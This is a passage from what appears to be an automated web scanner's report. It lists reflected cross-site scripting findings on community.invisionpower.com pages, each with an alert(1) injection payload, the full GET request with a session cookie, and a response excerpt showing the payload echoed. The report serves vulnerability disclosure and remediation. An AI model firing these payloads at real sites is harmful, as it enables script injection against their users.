Host: community.invisionpower.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 75d7b'><script>alert(1)</script>981f0c014da was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /blog/1174/entry-5797-ipnexus-12-dev-update-payment-improvements-anti-fraud-protection/page__show__newcomment75d7b'><script>alert(1)</script>981f0c014da HTTP/1.1
Host: community.invisionpower.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4653b"-alert(1)-"8c738f7fd40 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blog/1174/entry-5797-ipnexus-12-dev-update-payment-improvements-anti-fraud-protection/page__show__newcomment4653b"-alert(1)-"8c738f7fd40 HTTP/1.1
Host: community.invisionpower.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;
Response
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.f ...[SNIP]... <script type="text/javascript"> ipb.sharelinks.url = "http://community.invisionpower.com/blog/1174/entry-5797-ipnexus-12-dev-update-payment-improvements-anti-fraud-protection/page__show__newcomment4653b"-alert(1)-"8c738f7fd40"; ipb.sharelinks.title = "IP.Nexus 1.2 Dev Update: Payment Improvements & Anti-Fraud Protection"; ipb.sharelinks.bname = "Invision Power Services"; </script> ...[SNIP]...
2.30. http://community.invisionpower.com/blog/1174/entry-5807-ipnexus-12-dev-update-custom-customer-fields/ [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e2a9c"-alert(1)-"cf40b1e321c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blog/1174/entry-5807-ipnexus-12-dev-update-custom-customer-fields/?e2a9c"-alert(1)-"cf40b1e321c=1 HTTP/1.1
Host: community.invisionpower.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;
Response
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.f ...[SNIP]... <script type="text/javascript"> ipb.sharelinks.url = "http://community.invisionpower.com/blog/1174/entry-5807-ipnexus-12-dev-update-custom-customer-fields/?e2a9c"-alert(1)-"cf40b1e321c=1"; ipb.sharelinks.title = "IP.Nexus 1.2 Dev Update: Custom Customer Fields"; ipb.sharelinks.bname = "Invision Power Services"; </script> ...[SNIP]...
2.31. http://community.invisionpower.com/blog/1174/entry-5807-ipnexus-12-dev-update-custom-customer-fields/ [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload a23e7'><script>alert(1)</script>edfdfa2120a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /blog/1174/entry-5807-ipnexus-12-dev-update-custom-customer-fields/?a23e7'><script>alert(1)</script>edfdfa2120a=1 HTTP/1.1
Host: community.invisionpower.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1937a"-alert(1)-"b678fb81f8 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blog/1174/entry-5807-ipnexus-12-dev-update-custom-customer-fields/page__show__newcomment1937a"-alert(1)-"b678fb81f8 HTTP/1.1
Host: community.invisionpower.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 96d8c'><script>alert(1)</script>195a814bc00 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /blog/1174/entry-5807-ipnexus-12-dev-update-custom-customer-fields/page__show__newcomment96d8c'><script>alert(1)</script>195a814bc00 HTTP/1.1
Host: community.invisionpower.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;
Response
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.f
...[SNIP]...
<a href='http://community.invisionpower.com/blog/1174/entry-5807-ipnexus-12-dev-update-custom-customer-fields/page__show__newcomment96d8c'><script>alert(1)</script>195a814bc00?_rcid=11592#fastreply' title="Reply directly to this post" id='reply_comment_11592' class='reply_comment'>
...[SNIP]...
2.34. http://community.invisionpower.com/blog/2568/entry-5789-viril-101-release-with-bug-fixes-new-features/ [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload aed0d"-alert(1)-"5c4d62dddb8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blog/2568/entry-5789-viril-101-release-with-bug-fixes-new-features/?aed0d"-alert(1)-"5c4d62dddb8=1 HTTP/1.1
Host: community.invisionpower.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;
Response
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.f
...[SNIP]...
<script type="text/javascript">
ipb.sharelinks.url = "http://community.invisionpower.com/blog/2568/entry-5789-viril-101-release-with-bug-fixes-new-features/?aed0d"-alert(1)-"5c4d62dddb8=1";
ipb.sharelinks.title = "Viril 1.0.1 Release With Bug Fixes & New Features";
ipb.sharelinks.bname = "Invision Power Services";
</script>
...[SNIP]...
2.35. http://community.invisionpower.com/blog/2568/entry-5789-viril-101-release-with-bug-fixes-new-features/ [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload a7345'><script>alert(1)</script>8f568237069 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /blog/2568/entry-5789-viril-101-release-with-bug-fixes-new-features/?a7345'><script>alert(1)</script>8f568237069=1 HTTP/1.1
Host: community.invisionpower.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload edee4"-alert(1)-"26b08451a was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blog/2568/entry-5789-viril-101-release-with-bug-fixes-new-features/page__show__newcommentedee4"-alert(1)-"26b08451a HTTP/1.1
Host: community.invisionpower.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 91bc6'><script>alert(1)</script>783674a36c7 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /blog/2568/entry-5789-viril-101-release-with-bug-fixes-new-features/page__show__newcomment91bc6'><script>alert(1)</script>783674a36c7 HTTP/1.1
Host: community.invisionpower.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;
Response
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.f
...[SNIP]...
<a href='http://community.invisionpower.com/blog/2568/entry-5789-viril-101-release-with-bug-fixes-new-features/page__show__newcomment91bc6'><script>alert(1)</script>783674a36c7?_rcid=11544#fastreply' title="Reply directly to this post" id='reply_comment_11544' class='reply_comment'>
...[SNIP]...
2.38. http://community.invisionpower.com/files/file/3935-sos31-improve-next-previous-issue-links-in-iptracker-v100/ [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8eb36"-alert(1)-"326757020f2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /files/file/3935-sos31-improve-next-previous-issue-links-in-iptracker-v100/?8eb36"-alert(1)-"326757020f2=1 HTTP/1.1
Host: community.invisionpower.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;
Response
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.f
...[SNIP]...
<script type="text/javascript">
ipb.sharelinks.url = "http://community.invisionpower.com/files/file/3935-sos31-improve-next-previous-issue-links-in-iptracker-v100/?8eb36"-alert(1)-"326757020f2=1";
ipb.sharelinks.title = "(SOS31) Improve Next-Previous Issue links in IP.Tracker v1.0.0";
ipb.sharelinks.bname = "Invision Power Services";
</script>
...[SNIP]...
2.39. http://community.invisionpower.com/files/file/3936-ipdownloads-file-version-in-support-topic-title/ [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 228af"-alert(1)-"3451a0f7ce6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /files/file/3936-ipdownloads-file-version-in-support-topic-title/?228af"-alert(1)-"3451a0f7ce6=1 HTTP/1.1
Host: community.invisionpower.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;
Response
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.f
...[SNIP]...
<script type="text/javascript">
ipb.sharelinks.url = "http://community.invisionpower.com/files/file/3936-ipdownloads-file-version-in-support-topic-title/?228af"-alert(1)-"3451a0f7ce6=1";
ipb.sharelinks.title = "IP.Downloads file version in support topic title";
ipb.sharelinks.bname = "Invision Power Services";
</script>
...[SNIP]...
2.40. http://community.invisionpower.com/files/file/3937-peace/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://community.invisionpower.com
Path: /files/file/3937-peace/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 54fb5"-alert(1)-"94f3b1605b0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /files/file/3937-peace/?54fb5"-alert(1)-"94f3b1605b0=1 HTTP/1.1
Host: community.invisionpower.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;
Response
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.f
...[SNIP]...
<script type="text/javascript">
ipb.sharelinks.url = "http://community.invisionpower.com/files/file/3937-peace/?54fb5"-alert(1)-"94f3b1605b0=1";
ipb.sharelinks.title = "Peace";
ipb.sharelinks.bname = "Invision Power Services";
</script>
...[SNIP]...
2.41. http://community.invisionpower.com/files/file/3938-turkish-turkce-language-pack-for-m31-videos-system-203-public-side/ [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c0ec7"-alert(1)-"d8405c2df0f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /files/file/3938-turkish-turkce-language-pack-for-m31-videos-system-203-public-side/?c0ec7"-alert(1)-"d8405c2df0f=1 HTTP/1.1
Host: community.invisionpower.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;
Response
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.f
...[SNIP]...
<script type="text/javascript">
ipb.sharelinks.url = "http://community.invisionpower.com/files/file/3938-turkish-turkce-language-pack-for-m31-videos-system-203-public-side/?c0ec7"-alert(1)-"d8405c2df0f=1";
ipb.sharelinks.title = "Turkish / Türkçe Language Pack for (M31) Videos System 2.0.3 (public side)";
ipb.sharelinks.bname = "Invision Power Services";
</script>
...[SNIP]...
2.42. http://community.invisionpower.com/files/file/3939-vietnamese-3xx-lang/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://community.invisionpower.com
Path: /files/file/3939-vietnamese-3xx-lang/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 452cc"-alert(1)-"471a521f57a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /files/file/3939-vietnamese-3xx-lang/?452cc"-alert(1)-"471a521f57a=1 HTTP/1.1
Host: community.invisionpower.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;
2.43. http://community.invisionpower.com/files/file/3940-dp31-ihost/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://community.invisionpower.com
Path: /files/file/3940-dp31-ihost/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7300a"-alert(1)-"a151b03b4b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /files/file/3940-dp31-ihost/?7300a"-alert(1)-"a151b03b4b=1 HTTP/1.1
Host: community.invisionpower.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;
Response
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.f
...[SNIP]...
<script type="text/javascript">
ipb.sharelinks.url = "http://community.invisionpower.com/files/file/3940-dp31-ihost/?7300a"-alert(1)-"a151b03b4b=1";
ipb.sharelinks.title = "(DP31) iHost";
ipb.sharelinks.bname = "Invision Power Services";
</script>
...[SNIP]...
2.44. http://community.invisionpower.com/files/file/3941-vanilla-valentine/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://community.invisionpower.com
Path: /files/file/3941-vanilla-valentine/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 18a46"-alert(1)-"12d2b2f2f27 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /files/file/3941-vanilla-valentine/?18a46"-alert(1)-"12d2b2f2f27=1 HTTP/1.1
Host: community.invisionpower.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;
Response
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.f
...[SNIP]...
<script type="text/javascript">
ipb.sharelinks.url = "http://community.invisionpower.com/files/file/3941-vanilla-valentine/?18a46"-alert(1)-"12d2b2f2f27=1";
ipb.sharelinks.title = "Vanilla Valentine";
ipb.sharelinks.bname = "Invision Power Services";
</script>
...[SNIP]...
2.45. http://community.invisionpower.com/files/file/3942-sos31-file-version-in-online-list/ [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bf855"-alert(1)-"7755996cd4f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /files/file/3942-sos31-file-version-in-online-list/?bf855"-alert(1)-"7755996cd4f=1 HTTP/1.1
Host: community.invisionpower.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;
Response
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.f
...[SNIP]...
<script type="text/javascript">
ipb.sharelinks.url = "http://community.invisionpower.com/files/file/3942-sos31-file-version-in-online-list/?bf855"-alert(1)-"7755996cd4f=1";
ipb.sharelinks.title = "(SOS31) File Version in Online List";
ipb.sharelinks.bname = "Invision Power Services";
</script>
...[SNIP]...
2.46. http://community.invisionpower.com/files/file/3943-speed/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://community.invisionpower.com
Path: /files/file/3943-speed/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7b7e3"-alert(1)-"7fa62b66d30 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /files/file/3943-speed/?7b7e3"-alert(1)-"7fa62b66d30=1 HTTP/1.1
Host: community.invisionpower.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;
Response
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.f
...[SNIP]...
<script type="text/javascript">
ipb.sharelinks.url = "http://community.invisionpower.com/files/file/3943-speed/?7b7e3"-alert(1)-"7fa62b66d30=1";
ipb.sharelinks.title = "Speed";
ipb.sharelinks.bname = "Invision Power Services";
</script>
...[SNIP]...
2.47. http://community.invisionpower.com/files/file/3944-ipchat-12-turkish-language-pack/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://community.invisionpower.com
Path: /files/file/3944-ipchat-12-turkish-language-pack/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7f9a9"-alert(1)-"dc3219cb2fe was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /files/file/3944-ipchat-12-turkish-language-pack/?7f9a9"-alert(1)-"dc3219cb2fe=1 HTTP/1.1
Host: community.invisionpower.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
